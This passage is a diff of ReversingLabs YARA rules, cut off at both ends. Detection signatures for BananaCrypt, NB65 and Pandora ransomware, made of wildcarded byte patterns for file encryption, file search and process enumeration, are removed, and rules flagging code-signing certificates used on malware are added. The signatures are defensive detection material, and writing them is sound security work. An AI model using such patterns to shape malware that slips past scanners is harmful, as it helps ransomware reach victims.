-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15 ?? ??
-            ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
-        }
-		$encrypt_files_p3 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 55 89 E5 81
-            EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B
-            45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ??
-            8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39
-        }
-		$encrypt_files_p4 = {
-            D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 75 ?? C6 45 ?? ?? 8D 45 ?? 89 04 24
-            E8 ?? ?? ?? ?? 0F B6 45 ?? C9 C3 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D
-            ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83
-            EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7
-            04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83
-            EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8
-            ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B
-            51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ??
-            8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ??
-            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45
-        }
-		$encrypt_files_p5 = {
-            8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ??
-            39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D
-            ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
-            ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
-            45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ??
-            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24
-            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ??
-            ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-        }
-		$encrypt_files_p6 = {
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 8B 00
-            89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 85 ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 8D 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 3D ??
-            ?? ?? ?? 77 ?? 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 EC ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45
-            ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ?? C7 44 24 ?? ?? ?? ?? ?? 89 C1 89 54 24 ?? 8B 45
-            ?? 89 44 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 3B 55 ?? 89 95 ?? ?? ?? ?? 0F 85 ?? ?? ??
-            ?? 8B 45 ?? 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C1 E8 ?? 89 8D ?? ?? ?? ?? 85 C0
-            89 85 ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 89 85 ??
-            ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 45 ?? ?? 83 85 ?? ?? ?? ??
-            ?? 8B 55 ?? 39 95 ?? ?? ?? ?? 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-        }
-		$encrypt_files_p7 = {
-            C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 4D ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ?? 89 4C 24
-            ?? 8B 95 ?? ?? ?? ?? 89 54 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 83 EC ?? 3B 4D ?? 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 89 14 24 E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? C6 45 ??
-            ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52
-            8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24
-            ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 04 24 C7
-            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 50 8D 4D ?? 8B 45 ?? 39 C8 74 ?? 89 04 24 E8 ??
-            ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 89 45 ?? E9
-        }
 
-	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Bananacrypt : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BananaCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9e47d094-d7fc-57dd-826c-5321d0219273"
-		date = "2020-09-14"
-		modified = "2020-09-14"
+		id = "6975acb9-3b37-51f5-8b4d-0d1a090a18e2"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BananaCrypt.yara#L1-L103"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12930-L12946"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6bde4430e438947b0d7f10c4de11216929ec03af81b3d74f8b7bb8ed134d08d2"
+		logic_hash = "0155a8c71bf8426bbb980798772b04c145df5b8c4b60ff1a610a1236a47547ef"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BananaCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 55 ?? 89 8D ?? ?? ??
-            ?? 85 D2 74 ?? 8B 45 ?? 85 C0 0F 85 ?? ?? ?? ?? 31 F6 0F B6 13 84 D2 0F 84 ?? ?? ??
-            ?? 8D 43 ?? 88 95 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? 8D BD ?? ?? ?? ?? EB ?? 83 C0 ?? 83
-            C7 ?? 88 57 ?? 39 C1 74 ?? 0F B6 10 84 D2 75 ?? 89 BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            C6 00 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 F0 84
-            C0 0F 85 ?? ?? ?? ?? 8D 5D ?? 8D 76 ?? 8D BC 27 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04
-            24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ??
-            39 F9 89 C8 76 ?? 0F B6 41 ?? 89 CF 3C ?? 0F 95 C1 3C ?? 0F 95 C2 84 D1 0F 84 ?? ??
-            ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C6 07 ?? 8D 7E ?? 39 D8 89 BD ?? ?? ?? ?? 73
-            ?? 0F B6 56 ?? 84 D2 74 ?? 89 F9 8B BD ?? ?? ?? ?? EB ?? 90 0F B6 11 84 D2 74 ?? 83
-            C0 ?? 83 C1 ?? 88 50 ?? 39 D8 75 ?? 89 BD ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 31
-            FF 89 04 24 E8 ?? ?? ?? ?? 85 C0 89 C2 74 ?? 80 38 ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 90
-            83 C7 ?? 80 3C 3A ?? 75 ?? 89 85 ?? ?? ?? ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 89 95
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 46 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 74 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 7C 24 ?? 89 14 24 89
-        }
-		$encrypt_files_p2 = {
-            44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 89 F1 89 04 24 E8 ?? ?? ?? ??
-            83 EC ?? 89 F1 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 89 C7 8D
-            40 ?? 83 F8 ?? 76 ?? 89 F1 83 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F1 E8 ??
-            ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8
-            ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 89
-            F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
-            B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 8D ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8D 74 26 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24
-            E8 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3 8B 45 ?? 89 1C 24 89 44 24 ??
-            8B 45 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 C6 E9 ?? ?? ?? ?? 8D 65 ?? 31 C0 5B 5E 5F 5D
-            C3 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9
-        }
-		$find_files_p1 = {
-            8D 4C 24 ?? 83 E4 ?? FF 71 ?? 55 89 E5 57 56 53 51 81 EC ?? ?? ?? ?? 8B 31 8B 79 ??
-            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 7E ?? 89 74 24 ?? C7 04
-            24 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 8B 04 9F 89 5C 24 ?? 83 C3 ?? C7 04 24 ?? ?? ??
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 39 DE 75 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 47 ?? 89 04 24
-            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89
-            44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D BD ??
-            ?? ?? ?? F3 A5 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 C7 85
-        }
-		$find_files_p2 = {
-            8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ??
-            8D 44 03 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8
-            ?? ?? ?? ?? 89 DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ??
-            A9 ?? ?? ?? ?? 74 ?? 89 C1 00 C1 83 DA ?? C7 02 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7
-            42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 84 C0 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 65 ?? 31 C0 59 5B 5E
-            5F 5D 8D 61 ?? C3 C1 E8 ?? 83 C2 ?? EB ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 89 04 24 B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29
-            F9 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 29 CE 81 C1 ?? ?? ?? ?? C1 E9 ?? 89 45 ?? F3
-        }
-		$find_files_p3 = {
-            A5 89 1C 24 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 C6 74 ?? 89 44 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 34 24 E8 ??
-            ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 89 44 24
-            ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RADIANT, OOO" and pe.signatures [ i ] . serial == "6e:2d:34:49:27:2b:6b:96:b8:b9:f7:28:e8:75:80:d5" and 1421107200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_NB65 : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects NB65 ransomware."
-		author = "ReversingLabs"
-		id = "1aba009e-8065-5fb0-98e7-a595cb324076"
-		date = "2022-06-01"
-		modified = "2022-06-01"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.NB65.yara#L1-L68"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f8a0e265fc72a9f017b37ce4b6dbb878285a5d298ab1b8c69f9fde7159426981"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "NB65"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$encrypt_files = {
-            E8 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? 75 ?? 33 C9 90 8A 44 0D ??
-            0F B6 C0 83 E8 ?? 6B C0 ?? 99 F7 FB 8D 42 ?? 99 F7 FB 88 54 0D ?? 41 83 F9 ?? 72 ??
-            8D 45 ?? 89 45 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 50
-            ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D0
-            85 C0 75 ?? 33 F6 66 90 A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ??
-            8D 50 ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? FF B4 B5 ?? ?? ??
-            ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$find_files = {
-            57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ??
-            5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ??
-            80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ??
-            ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ??
-            8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$enum_procs = {
-            33 C9 66 90 8A 84 0D ?? ?? ?? ?? 0F B6 C0 83 E8 ?? 8D 04 C0 99 F7 BD ?? ?? ?? ?? 8D
-            42 ?? 99 F7 BD ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? A1 ?? ?? ?? ?? 8B
-            40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41
-            ?? 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? 6A ?? E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? 8D 50 ?? 8B 8D ?? ?? ?? ?? 89 08 C7 02 ?? ??
-            ?? ?? 8B 4E ?? 89 48 ?? 8B 4E ?? 89 01 89 56 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0
-            0F 85 ?? ?? ?? ?? 5B A1 ?? ?? ?? ?? 8B 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9
-            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 ?? 57 FF D0 8B 4D ?? 5F 33 CD 5E E8 ?? ?? ??
-            ?? 8B E5 5D C3
-        }
 
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $enum_procs ) and ( $encrypt_files )
-}
-rule REVERSINGLABS_Win64_Ransomware_Pandora : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Pandora ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "18182bbe-1678-5d0b-a7ee-80c4bbaee99e"
-		date = "2022-06-01"
-		modified = "2022-06-01"
+		id = "0e18d9ef-e861-5583-a2a3-5f54fae8d813"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Pandora.yara#L1-L95"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12948-L12964"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6576bde36ae9a9bc2e9dd878db788c608083b84d96d31e6898f48a264c6b7f1a"
+		logic_hash = "8311b36f008e31b7ac27b439fa46da4c90ab4be6c7c89426f8e1939963bc3d7d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
